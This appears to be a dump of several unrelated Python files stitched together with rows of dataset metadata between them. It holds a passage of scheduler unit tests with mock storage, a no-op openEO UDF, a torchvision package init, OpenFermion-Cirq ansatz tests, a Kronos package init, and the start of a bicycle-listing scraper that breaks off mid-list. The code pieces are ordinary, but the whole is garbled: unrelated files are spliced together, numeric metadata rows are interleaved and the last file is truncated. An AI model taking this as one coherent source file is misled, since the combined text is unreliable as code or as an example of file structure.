# THEN
task_id = uuid.uuid4()
with pytest.raises(Exception) as excinfo:
await scheduler.get_task(task_id)
# THEN
payload = {"return": ["id", "process_name", "schedule_name", "state", {"alias": "start_time", "format": "YYYY-MM-DD HH24:MI:SS.MS", "column": "start_time"}, {"alias": "end_time", "format": "YYYY-MM-DD HH24:MI:SS.MS", "column": "end_time"}, "reason", "exit_code"], "where": {"column": "id", "condition": "=", "value": str(task_id)}}
args, kwargs = log_exception.call_args
assert 'Query failed: %s' == args[0]
p = json.loads(args[1])
assert payload == p
@pytest.mark.asyncio
async def test_get_tasks(self, mocker):
# GIVEN
scheduler, schedule, log_info, log_exception, log_error, log_debug = await self.scheduler_fixture(mocker)
# Assert that there is no North task queued for schedule
with pytest.raises(KeyError) as excinfo:
assert scheduler._schedule_executions[schedule.id] is True
# Now queue task and assert that the North task has been queued
await scheduler.queue_task(schedule.id)
assert isinstance(scheduler._schedule_executions[schedule.id], scheduler._ScheduleExecution)
# Confirm that no task has started yet
assert 0 == len(scheduler._schedule_executions[schedule.id].task_processes)
await scheduler._start_task(schedule)
# Confirm that task has started
assert 1 == len(scheduler._schedule_executions[schedule.id].task_processes)
task_id = list(scheduler._schedule_executions[schedule.id].task_processes.keys())[0]
# WHEN
tasks = await scheduler.get_tasks()
# THEN
assert schedule.process_name == tasks[0].process_name
        assert tasks[0].reason == ''
assert tasks[0].state is not None
assert tasks[0].cancel_requested is None
assert tasks[0].start_time is not None
assert tasks[0].end_time is not None
        assert tasks[0].exit_code == '0'
@pytest.mark.asyncio
async def test_get_tasks_exception(self, mocker):
# GIVEN
scheduler, schedule, log_info, log_exception, log_error, log_debug = await self.scheduler_fixture(mocker)
log_debug = mocker.patch.object(scheduler._logger, 'debug', side_effect=Exception())
# WHEN
with pytest.raises(Exception) as excinfo:
tasks = await scheduler.get_tasks()
# THEN
payload = {"return": ["id", "process_name", "schedule_name", "state", {"alias": "start_time", "column": "start_time", "format": "YYYY-MM-DD HH24:MI:SS.MS"}, {"alias": "end_time", "column": "end_time", "format": "YYYY-MM-DD HH24:MI:SS.MS"}, "reason", "exit_code"], "limit": 100}
args, kwargs = log_exception.call_args
assert 'Query failed: %s' == args[0]
p = json.loads(args[1])
assert payload == p
@pytest.mark.asyncio
async def test_cancel_task_all_ok(self, mocker):
# GIVEN
scheduler, schedule, log_info, log_exception, log_error, log_debug = await self.scheduler_fixture(mocker)
# Assert that there is no task queued for schedule
with pytest.raises(KeyError) as excinfo:
assert scheduler._schedule_executions[schedule.id] is True
# Now queue task and assert that the task has been queued
await scheduler.queue_task(schedule.id)
assert isinstance(scheduler._schedule_executions[schedule.id], scheduler._ScheduleExecution)
# Confirm that no task has started yet
assert 0 == len(scheduler._schedule_executions[schedule.id].task_processes)
await scheduler._start_task(schedule)
# Confirm that task has started
assert 1 == len(scheduler._schedule_executions[schedule.id].task_processes)
task_id = list(scheduler._schedule_executions[schedule.id].task_processes.keys())[0]
# Confirm that cancel request has not been made
assert scheduler._schedule_executions[schedule.id].task_processes[task_id].cancel_requested is None
# WHEN
await scheduler.cancel_task(task_id)
# THEN
assert scheduler._schedule_executions[schedule.id].task_processes[task_id].cancel_requested is not None
assert 2 == log_info.call_count
# args, kwargs = log_info.call_args_list[0]
# assert ("Queued schedule '%s' for execution", 'OMF to PI north') == args
args, kwargs = log_info.call_args_list[0]
assert "Process started: Schedule '%s' process '%s' task %s pid %s, %s running tasks\n%s" in args
assert 'OMF to PI north' in args
assert 'North Readings to PI' in args
args, kwargs = log_info.call_args_list[1]
assert "Stopping process: Schedule '%s' process '%s' task %s pid %s\n%s" in args
assert 'OMF to PI north' in args
assert 'North Readings to PI' in args
@pytest.mark.asyncio
async def test_cancel_task_exception(self, mocker):
# GIVEN
scheduler, schedule, log_info, log_exception, log_error, log_debug = await self.scheduler_fixture(mocker)
# WHEN
# THEN
with pytest.raises(TaskNotRunningError) as excinfo:
await scheduler.cancel_task(uuid.uuid4())
@pytest.mark.asyncio
async def test_not_ready_and_paused(self, mocker):
# GIVEN
scheduler, schedule, log_info, log_exception, log_error, log_debug = await self.scheduler_fixture(mocker)
mocker.patch.object(scheduler, '_ready', False)
mocker.patch.object(scheduler, '_paused', True)
# WHEN
# THEN
with pytest.raises(NotReadyError) as excinfo:
await scheduler.start()
with pytest.raises(NotReadyError) as excinfo:
await scheduler.get_scheduled_processes()
with pytest.raises(NotReadyError) as excinfo:
await scheduler.get_schedules()
with pytest.raises(NotReadyError) as excinfo:
await scheduler.get_schedule(uuid.uuid4())
with pytest.raises(NotReadyError) as excinfo:
await scheduler.save_schedule(Schedule(Schedule.Type.INTERVAL))
with pytest.raises(NotReadyError) as excinfo:
await scheduler.disable_schedule(uuid.uuid4())
with pytest.raises(NotReadyError) as excinfo:
await scheduler.enable_schedule(uuid.uuid4())
with pytest.raises(NotReadyError) as excinfo:
await scheduler.queue_task(uuid.uuid4())
with pytest.raises(NotReadyError) as excinfo:
await scheduler.delete_schedule(uuid.uuid4())
with pytest.raises(NotReadyError) as excinfo:
await scheduler.get_running_tasks()
with pytest.raises(NotReadyError) as excinfo:
await scheduler.cancel_task(uuid.uuid4())
@pytest.mark.skip("_terminate_child_processes() not fit for unit test.")
@pytest.mark.asyncio
async def test__terminate_child_processes(self, mocker):
pass
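# The mock storage clients below provide just enough of the StorageClientAsync
# API for the tests above; _get_storage_service answers the service-discovery
# call made during construction with a fake service record.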
class MockStorage(StorageClientAsync):
def __init__(self, core_management_host=None, core_management_port=None):
super().__init__(core_management_host, core_management_port)
def _get_storage_service(self, host, port):
return {
"id": uuid.uuid4(),
"name": "Fledge Storage",
"type": "Storage",
"service_port": 9999,
"management_port": 9999,
"address": "0.0.0.0",
"protocol": "http"
}
class MockStorageAsync(StorageClientAsync):
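    # Canned 'schedules' rows served by query_tbl(); these UUIDs are the ones
    # the tests reference directly (purge, backup hourly, COAP listener south,
    # OMF to PI north, ...).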
schedules = [
{
"id": "cea17db8-6ccc-11e7-907b-a6006ad3dba0",
"process_name": "purge",
"schedule_name": "purge",
"schedule_type": 4,
"schedule_interval": "01:00:00",
"schedule_time": "",
"schedule_day": 0,
"exclusive": "t",
"enabled": "t"
},
{
"id": "2176eb68-7303-11e7-8cf7-a6006ad3dba0",
"process_name": "stats collector",
"schedule_name": "stats collection",
"schedule_type": 2,
"schedule_interval": "00:00:15",
"schedule_time": "00:00:15",
"schedule_day": 3,
"exclusive": "f",
"enabled": "t"
},
{
"id": "d1631422-9ec6-11e7-abc4-cec278b6b50a",
"process_name": "backup",
"schedule_name": "backup hourly",
"schedule_type": 3,
"schedule_interval": "01:00:00",
"schedule_time": "",
"schedule_day": 0,
"exclusive": "t",
"enabled": "f"
},
{
"id": "ada12840-68d3-11e7-907b-a6006ad3dba0",
"process_name": "COAP",
"schedule_name": "COAP listener south",
"schedule_type": 1,
"schedule_interval": "00:00:00",
"schedule_time": "",
"schedule_day": 0,
"exclusive": "t",
"enabled": "t"
},
{
"id": "2b614d26-760f-11e7-b5a5-be2e44b06b34",
"process_name": "North Readings to PI",
"schedule_name": "OMF to PI north",
"schedule_type": 3,
"schedule_interval": "00:00:30",
"schedule_time": "",
"schedule_day": 0,
"exclusive": "t",
"enabled": "t"
},
{
"id": "5d7fed92-fb9a-11e7-8c3f-9a214cf093ae",
"process_name": "North Readings to OCS",
"schedule_name": "OMF to OCS north",
"schedule_type": 3,
"schedule_interval": "1 day 00:00:40",
"schedule_time": "",
"schedule_day": 0,
"exclusive": "t",
"enabled": "f"
},
]
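    # Canned 'scheduled_processes' rows; each 'script' lists the command
    # fragments used to launch the corresponding process.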
scheduled_processes = [
{
"name": "purge",
"script": [
"tasks/purge"
]
},
{
"name": "stats collector",
"script": [
"tasks/statistics"
]
},
{
"name": "backup",
"script": [
"tasks/backup_postgres"
]
},
{
"name": "COAP",
"script": [
"services/south"
]
},
{
"name": "North Readings to PI",
"script": [
"tasks/north",
"--stream_id",
"1",
"--debug_level",
"1"
]
},
{
"name": "North Readings to OCS",
"script": [
"tasks/north",
"--stream_id",
"4",
"--debug_level",
"1"
]
},
]
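    # A single canned 'tasks' row; its empty reason and exit code '0' are what
    # test_get_task and test_get_tasks assert against.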
tasks = [
{
"id": "259b8570-65c1-4b92-8c62-e9642631a600",
"process_name": "North Readings to PI",
"state": 1,
"start_time": "2018-02-06 13:28:14.477868",
"end_time": "2018-02-06 13:28:14.856375",
"exit_code": "0",
"reason": ""
}
]
def __init__(self, core_management_host=None, core_management_port=None):
super().__init__(core_management_host, core_management_port)
def _get_storage_service(self, host, port):
return {
"id": uuid.uuid4(),
"name": "Fledge Storage",
"type": "Storage",
"service_port": 9999,
"management_port": 9999,
"address": "0.0.0.0",
"protocol": "http"
}
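    # The table mutators below are stubs: only update_tbl returns a row count,
    # which the schedule-update path checks (see test_save_schedule_update).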
@classmethod
async def insert_into_tbl(cls, table_name, payload):
pass
@classmethod
async def update_tbl(cls, table_name, payload):
# Only valid for test_save_schedule_update
if table_name == "schedules":
return {"count": 1}
@classmethod
async def delete_from_tbl(cls, table_name, condition=None):
pass
@classmethod
async def query_tbl_with_payload(cls, table_name, query_payload):
if table_name == 'tasks':
return {
"count": len(MockStorageAsync.tasks),
"rows": MockStorageAsync.tasks
}
@classmethod
async def query_tbl(cls, table_name, query=None):
if table_name == 'schedules':
return {
"count": len(MockStorageAsync.schedules),
"rows": MockStorageAsync.schedules
}
if table_name == 'scheduled_processes':
return {
"count": len(MockStorageAsync.scheduled_processes),
"rows": MockStorageAsync.scheduled_processes
}
| 42.621555 | 339 | 0.652936 | 8,013 | 69,601 | 5.407088 | 0.056658 | 0.030212 | 0.04316 | 0.058809 | 0.848224 | 0.807903 | 0.781337 | 0.760565 | 0.726637 | 0.695617 | 0 | 0.020023 | 0.252295 | 69,601 | 1,632 | 340 | 42.647672 | 0.812532 | 0.058232 | 0 | 0.64881 | 0 | 0.002551 | 0.114192 | 0.02399 | 0 | 0 | 0 | 0.000613 | 0.179422 | 1 | 0.006803 | false | 0.005102 | 0.011054 | 0.005102 | 0.034864 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0 | 6 | 7ca89ca7169c0f1670fef9182b15d74e96bdbeae | 131 | py | Python | tests/data/udf_noop.py | Open-EO/openeo-geopyspark-driver | afd5902f426d2aa456d70ed6f2d51b6907de1cab | ["Apache-2.0"] | 12 | 2018-03-22T15:02:24.000Z | 2022-03-30T20:13:29.000Z | tests/data/udf_noop.py | Open-EO/openeo-geopyspark-driver | afd5902f426d2aa456d70ed6f2d51b6907de1cab | ["Apache-2.0"] | 116 | 2018-09-27T17:17:14.000Z | 2022-03-30T18:32:29.000Z | tests/data/udf_noop.py | Open-EO/openeo-geopyspark-driver | afd5902f426d2aa456d70ed6f2d51b6907de1cab | ["Apache-2.0"] | 3 | 2019-06-28T15:44:32.000Z | 2021-10-30T07:05:54.000Z |
from openeo.udf import XarrayDataCube
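# No-op UDF test fixture: apply_datacube returns the input datacube unchanged.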
def apply_datacube(cube: XarrayDataCube, context: dict) -> XarrayDataCube:
return cube
| 21.833333 | 74 | 0.78626 | 15 | 131 | 6.8 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.145038 | 131 | 5 | 75 | 26.2 | 0.910714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 |
0
| 6 |
861a029a9ec9483f45fb602ca0d783eedc1d7f90
| 161 |
py
|
Python
|
torchvision/datasets/samplers/__init__.py
|
yoshitomo-matsubara/vision
|
03d11338f3faf94a0749549912593ddb8b70be17
|
[
"BSD-3-Clause"
] | 12,063 |
2017-01-18T19:58:38.000Z
|
2022-03-31T23:08:44.000Z
|
torchvision/datasets/samplers/__init__.py
|
yoshitomo-matsubara/vision
|
03d11338f3faf94a0749549912593ddb8b70be17
|
[
"BSD-3-Clause"
] | 4,673 |
2017-01-18T21:30:03.000Z
|
2022-03-31T20:58:33.000Z
|
torchvision/datasets/samplers/__init__.py
|
yoshitomo-matsubara/vision
|
03d11338f3faf94a0749549912593ddb8b70be17
|
[
"BSD-3-Clause"
] | 7,132 |
2017-01-18T18:12:23.000Z
|
2022-03-31T21:19:10.000Z
|
from .clip_sampler import DistributedSampler, UniformClipSampler, RandomClipSampler
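# Re-export the clip samplers so they are importable from the package root.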
__all__ = ("DistributedSampler", "UniformClipSampler", "RandomClipSampler")
| 40.25 | 83 | 0.838509 | 11 | 161 | 11.818182 | 0.727273 | 0.553846 | 0.815385 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.074534 | 161 | 3 | 84 | 53.666667 | 0.872483 | 0 | 0 | 0 | 0 | 0 | 0.329193 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 1 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 |
0
| 6 |
864c964912d3ec24af5b6c8c081c0833e7bd9b90
| 9,845 |
py
|
Python
|
openfermioncirq/variational/ansatzes/default_initial_params_test.py
|
viathor/OpenFermion-Cirq
|
b4b7f8d82c40f0a6282873b5d2867e9d8778cea6
|
[
"Apache-2.0"
] | null | null | null |
openfermioncirq/variational/ansatzes/default_initial_params_test.py
|
viathor/OpenFermion-Cirq
|
b4b7f8d82c40f0a6282873b5d2867e9d8778cea6
|
[
"Apache-2.0"
] | null | null | null |
openfermioncirq/variational/ansatzes/default_initial_params_test.py
|
viathor/OpenFermion-Cirq
|
b4b7f8d82c40f0a6282873b5d2867e9d8778cea6
|
[
"Apache-2.0"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy
import pytest
import cirq
import openfermion
from openfermioncirq import (
HamiltonianObjective,
LowRankTrotterAnsatz,
SplitOperatorTrotterAnsatz,
SwapNetworkTrotterAnsatz,
SwapNetworkTrotterHubbardAnsatz,
VariationalStudy,
prepare_gaussian_state,
simulate_trotter)
from openfermioncirq.trotter import (
LINEAR_SWAP_NETWORK, LOW_RANK, LowRankTrotterAlgorithm, SPLIT_OPERATOR)
# 4-qubit random DiagonalCoulombHamiltonian
diag_coul_hamiltonian = openfermion.random_diagonal_coulomb_hamiltonian(
4, real=True, seed=47141)
# 4-qubit H2 2-2 with bond length 0.7414
bond_length = 0.7414
geometry = [('H', (0., 0., 0.)), ('H', (0., 0., bond_length))]
h2_hamiltonian = openfermion.load_molecular_hamiltonian(
geometry, 'sto-3g', 1, format(bond_length), 2, 2)
# 4-qubit LiH 2-2 with bond length 1.45
bond_length = 1.45
geometry = [('Li', (0., 0., 0.)), ('H', (0., 0., bond_length))]
lih_hamiltonian = openfermion.load_molecular_hamiltonian(
geometry, 'sto-3g', 1, format(bond_length), 2, 2)
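# Each parametrized case pairs an ansatz built with default settings against the
# Trotter algorithm and order that its default initial parameters are meant to
# reproduce, plus a numeric tolerance for the comparison.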
@pytest.mark.parametrize(
'ansatz, trotter_algorithm, order, hamiltonian, atol', [
(SwapNetworkTrotterAnsatz(diag_coul_hamiltonian, iterations=1),
LINEAR_SWAP_NETWORK, 1, diag_coul_hamiltonian, 5e-5),
(SplitOperatorTrotterAnsatz(diag_coul_hamiltonian, iterations=1),
SPLIT_OPERATOR, 1, diag_coul_hamiltonian, 5e-5),
(LowRankTrotterAnsatz(h2_hamiltonian, iterations=1),
LOW_RANK, 0, h2_hamiltonian, 5e-5),
(LowRankTrotterAnsatz(lih_hamiltonian, iterations=1, final_rank=3),
LowRankTrotterAlgorithm(final_rank=3), 0, lih_hamiltonian, 5e-5),
(SwapNetworkTrotterHubbardAnsatz(2, 2, 1.0, 4.0, iterations=1),
LINEAR_SWAP_NETWORK, 1,
openfermion.get_diagonal_coulomb_hamiltonian(
openfermion.reorder(
openfermion.fermi_hubbard(2, 2, 1.0, 4.0),
openfermion.up_then_down)
),
5e-5)
])
def test_trotter_ansatzes_default_initial_params_iterations_1(
ansatz, trotter_algorithm, order, hamiltonian, atol):
"""Check that a Trotter ansatz with one iteration and default parameters
is consistent with time evolution with one Trotter step."""
objective = HamiltonianObjective(hamiltonian)
qubits = ansatz.qubits
if isinstance(hamiltonian, openfermion.DiagonalCoulombHamiltonian):
one_body = hamiltonian.one_body
elif isinstance(hamiltonian, openfermion.InteractionOperator):
one_body = hamiltonian.one_body_tensor
if isinstance(ansatz, SwapNetworkTrotterHubbardAnsatz):
occupied_orbitals = (range(len(qubits)//4), range(len(qubits)//4))
else:
occupied_orbitals = range(len(qubits)//2)
preparation_circuit = cirq.Circuit(
prepare_gaussian_state(
qubits,
openfermion.QuadraticHamiltonian(one_body),
occupied_orbitals=occupied_orbitals
)
)
# Compute value using ansatz circuit and objective
circuit = cirq.resolve_parameters(
preparation_circuit + ansatz.circuit,
ansatz.param_resolver(ansatz.default_initial_params()))
result = circuit.final_wavefunction(
qubit_order=ansatz.qubit_permutation(qubits))
obj_val = objective.value(result)
# Compute value using study
study = VariationalStudy(
'study',
ansatz,
objective,
preparation_circuit=preparation_circuit)
study_val = study.value_of(ansatz.default_initial_params())
# Compute value by simulating time evolution
if isinstance(hamiltonian, openfermion.DiagonalCoulombHamiltonian):
half_way_hamiltonian = openfermion.DiagonalCoulombHamiltonian(
one_body=hamiltonian.one_body,
two_body=0.5 * hamiltonian.two_body)
elif isinstance(hamiltonian, openfermion.InteractionOperator):
half_way_hamiltonian = openfermion.InteractionOperator(
constant=hamiltonian.constant,
one_body_tensor=hamiltonian.one_body_tensor,
two_body_tensor=0.5 * hamiltonian.two_body_tensor)
simulation_circuit = cirq.Circuit(
simulate_trotter(
qubits,
half_way_hamiltonian,
time=ansatz.adiabatic_evolution_time,
n_steps=1,
order=order,
algorithm=trotter_algorithm)
)
final_state = (
preparation_circuit + simulation_circuit).final_wavefunction()
correct_val = openfermion.expectation(
objective._hamiltonian_linear_op, final_state).real
numpy.testing.assert_allclose(obj_val, study_val, atol=atol)
numpy.testing.assert_allclose(obj_val, correct_val, atol=atol)
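# Same consistency check with two iterations: the adiabatic path is now sampled
# at the quarter and three-quarter points, so two Trotter steps are simulated.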
@pytest.mark.parametrize(
'ansatz, trotter_algorithm, order, hamiltonian, atol', [
(SwapNetworkTrotterAnsatz(diag_coul_hamiltonian, iterations=2),
LINEAR_SWAP_NETWORK, 1, diag_coul_hamiltonian, 5e-5),
(SplitOperatorTrotterAnsatz(diag_coul_hamiltonian, iterations=2),
SPLIT_OPERATOR, 1, diag_coul_hamiltonian, 5e-5),
(LowRankTrotterAnsatz(h2_hamiltonian, iterations=2),
LOW_RANK, 0, h2_hamiltonian, 5e-5),
(LowRankTrotterAnsatz(lih_hamiltonian, iterations=2, final_rank=3),
LowRankTrotterAlgorithm(final_rank=3), 0, lih_hamiltonian, 1e-3),
(SwapNetworkTrotterHubbardAnsatz(2, 2, 1.0, 4.0, iterations=2),
LINEAR_SWAP_NETWORK, 1,
openfermion.get_diagonal_coulomb_hamiltonian(
openfermion.reorder(
openfermion.fermi_hubbard(2, 2, 1.0, 4.0),
openfermion.up_then_down)
),
5e-5)
])
def test_trotter_ansatzes_default_initial_params_iterations_2(
ansatz, trotter_algorithm, order, hamiltonian, atol):
"""Check that a Trotter ansatz with two iterations and default parameters
is consistent with time evolution with two Trotter steps."""
objective = HamiltonianObjective(hamiltonian)
qubits = ansatz.qubits
if isinstance(hamiltonian, openfermion.DiagonalCoulombHamiltonian):
one_body = hamiltonian.one_body
elif isinstance(hamiltonian, openfermion.InteractionOperator):
one_body = hamiltonian.one_body_tensor
if isinstance(ansatz, SwapNetworkTrotterHubbardAnsatz):
occupied_orbitals = (range(len(qubits)//4), range(len(qubits)//4))
else:
occupied_orbitals = range(len(qubits)//2)
preparation_circuit = cirq.Circuit(
prepare_gaussian_state(
qubits,
openfermion.QuadraticHamiltonian(one_body),
occupied_orbitals=occupied_orbitals
)
)
# Compute value using ansatz circuit and objective
circuit = cirq.resolve_parameters(
preparation_circuit + ansatz.circuit,
ansatz.param_resolver(ansatz.default_initial_params()))
result = circuit.final_wavefunction(
qubit_order=ansatz.qubit_permutation(qubits))
obj_val = objective.value(result)
# Compute value using study
study = VariationalStudy(
'study',
ansatz,
objective,
preparation_circuit=preparation_circuit)
study_val = study.value_of(ansatz.default_initial_params())
# Compute value by simulating time evolution
if isinstance(hamiltonian, openfermion.DiagonalCoulombHamiltonian):
quarter_way_hamiltonian = openfermion.DiagonalCoulombHamiltonian(
one_body=hamiltonian.one_body,
two_body=0.25 * hamiltonian.two_body)
three_quarters_way_hamiltonian = openfermion.DiagonalCoulombHamiltonian(
one_body=hamiltonian.one_body,
two_body=0.75 * hamiltonian.two_body)
elif isinstance(hamiltonian, openfermion.InteractionOperator):
quarter_way_hamiltonian = openfermion.InteractionOperator(
constant=hamiltonian.constant,
one_body_tensor=hamiltonian.one_body_tensor,
two_body_tensor=0.25 * hamiltonian.two_body_tensor)
three_quarters_way_hamiltonian = openfermion.InteractionOperator(
constant=hamiltonian.constant,
one_body_tensor=hamiltonian.one_body_tensor,
two_body_tensor=0.75 * hamiltonian.two_body_tensor)
simulation_circuit = cirq.Circuit(
simulate_trotter(
qubits,
quarter_way_hamiltonian,
time=0.5 * ansatz.adiabatic_evolution_time,
n_steps=1,
order=order,
algorithm=trotter_algorithm),
simulate_trotter(
qubits,
three_quarters_way_hamiltonian,
time=0.5 * ansatz.adiabatic_evolution_time,
n_steps=1,
order=order,
algorithm=trotter_algorithm)
)
final_state = (
preparation_circuit + simulation_circuit).final_wavefunction()
correct_val = openfermion.expectation(
objective._hamiltonian_linear_op, final_state).real
numpy.testing.assert_allclose(obj_val, study_val, atol=atol)
numpy.testing.assert_allclose(obj_val, correct_val, atol=atol)
| 40.514403 | 80 | 0.685729 | 1,040 | 9,845 | 6.247115 | 0.1875 | 0.023703 | 0.027705 | 0.022626 | 0.829614 | 0.813298 | 0.812683 | 0.812683 | 0.770817 | 0.754502 | 0 | 0.020698 | 0.234434 | 9,845 | 242 | 81 | 40.681818 | 0.841316 | 0.116912 | 0 | 0.679144 | 0 | 0 | 0.014903 | 0 | 0 | 0 | 0 | 0 | 0.02139 | 1 | 0.010695 | false | 0 | 0.032086 | 0 | 0.042781 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0 | 6 | 86748acfd2e2d6f503ac8703ff17fb7002cb2fc1 | 252 | py | Python | build/lib/Kronos_heureka_code/Zeit/__init__.py | heureka-code/Kronos-heureka-code | 0ddbc93ec69f0bc50075071e6a3e406c9cc97737 | ["MIT"] | null | null | null | build/lib/Kronos_heureka_code/Zeit/__init__.py | heureka-code/Kronos-heureka-code | 0ddbc93ec69f0bc50075071e6a3e406c9cc97737 | ["MIT"] | null | null | null | build/lib/Kronos_heureka_code/Zeit/__init__.py | heureka-code/Kronos-heureka-code | 0ddbc93ec69f0bc50075071e6a3e406c9cc97737 | ["MIT"] | null | null | null |
from Kronos_heureka_code.Zeit.Uhrzeit import Uhrzeit, Stunde, Minute, Sekunde
from Kronos_heureka_code.Zeit.Datum.Monat import Monate
from Kronos_heureka_code.Zeit.Datum.Jahr import Jahr, Zeitrechnung
from Kronos_heureka_code.Zeit.Datum.Tag import Tag
| 50.4 | 77 | 0.861111 | 39 | 252 | 5.358974 | 0.410256 | 0.191388 | 0.325359 | 0.401914 | 0.550239 | 0.430622 | 0 | 0 | 0 | 0 | 0 | 0 | 0.079365 | 252 | 4 | 78 | 63 | 0.900862 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0 | 6 | 867722c3f684f02eb3e24dffeab626e5a7b8bb2c | 19,936 | py | Python | pycle/bicycle-scrapes/epey-scrape/downLink5.py | fusuyfusuy/School-Projects | 8e38f19da90f63ac9c9ec91e550fc5aaab3d0234 | ["MIT"] | null | null | null | pycle/bicycle-scrapes/epey-scrape/downLink5.py | fusuyfusuy/School-Projects | 8e38f19da90f63ac9c9ec91e550fc5aaab3d0234 | ["MIT"] | null | null | null | pycle/bicycle-scrapes/epey-scrape/downLink5.py | fusuyfusuy/School-Projects | 8e38f19da90f63ac9c9ec91e550fc5aaab3d0234 | ["MIT"] | null | null | null |
from bs4 import BeautifulSoup
import os
import wget
from urllib.request import Request, urlopen
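# Product pages scraped from epey.com: each entry pairs a bicycle model name
# with the URL of its detail page.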
bicycles=[{'name': 'Kron XC150 27.5 HD Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-xc150-27-5-hd.html'}, {'name': 'Corelli Trivor 3 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-trivor-3-0.html'}, {'name': 'Salcano Hector 26 V Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-hector-26-v.html'}, {'name': 'Corelli Atrox 3.2 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-atrox-3-2.html'}, {'name': 'Mosso WildFire LTD HYD 27.5 Bisiklet', 'link': 'https://www.epey.com/bisiklet/mosso-wildfire-hyd-27-5.html'}, {'name': 'Corelli Via 1.2 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-via-1-2.html'}, {'name': 'Kron FD 1000 Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-fd-1000.html'}, {'name': 'Bisan CTS 5200 Bisiklet', 'link': 'https://www.epey.com/bisiklet/bisan-cts-5200.html'}, {'name': 'Kron XC100 26 MD Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-xc100-26-md.html'}, {'name': 'Bisan SPX-3250 Bisiklet', 'link': 'https://www.epey.com/bisiklet/bisan-spx-3250.html'}, {'name': 'Kron RC1000 Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-rc1000.html'}, {'name': 'Carraro E-Viva Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-e-viva.html'}, {'name': 'Kron Ares 4.0 26 MD Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-ares-4-0-26-md.html'}, {'name': 'Carraro Monster 16 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-monster-16.html'}, {'name': 'Salcano Helen 26 Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-helen-26.html'}, {'name': 'Bianchi RCX 527 Bisiklet', 'link': 'https://www.epey.com/bisiklet/bianchi-rcx-527-27-5.html'}, {'name': 'RKS TNT5 Bisiklet', 'link': 'https://www.epey.com/bisiklet/rks-tnt5.html'}, {'name': 'Corelli Via Lady 1.1 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-via-lady-1-1.html'}, {'name': 'Corelli Snoop 3.0 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-snoop-3-0.html'}, {'name': 'Corelli Dolce 2.0 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-dolce-2-0.html'}, {'name': 'Corelli Neon 2.1 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-neon-2-1.html'}, {'name': 'Kron CX100 Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-cx100-man.html'}, {'name': 'Bianchi Aspid 27 Bisiklet', 'link': 'https://www.epey.com/bisiklet/bianchi-aspid-27.html'}, {'name': 'Salcano İzmir Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-izmir.html'}, {'name': 'Ümit 2610 Alanya Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2610-alanya.html'}, {'name': 'Kross Trans 5.0 Bisiklet', 'link': 'https://www.epey.com/bisiklet/kross-trans-5-0.html'}, {'name': 'Kron ETX500 Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-etx500.html'}, {'name': 'Salcano Attack 14 Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-attack-14.html'}, {'name': 'Corelli Banner Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-banner.html'}, {'name': 'Corelli Voras 1.0 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-voras-1-0.html'}, {'name': 'Peugeot JM244 Bisiklet', 'link': 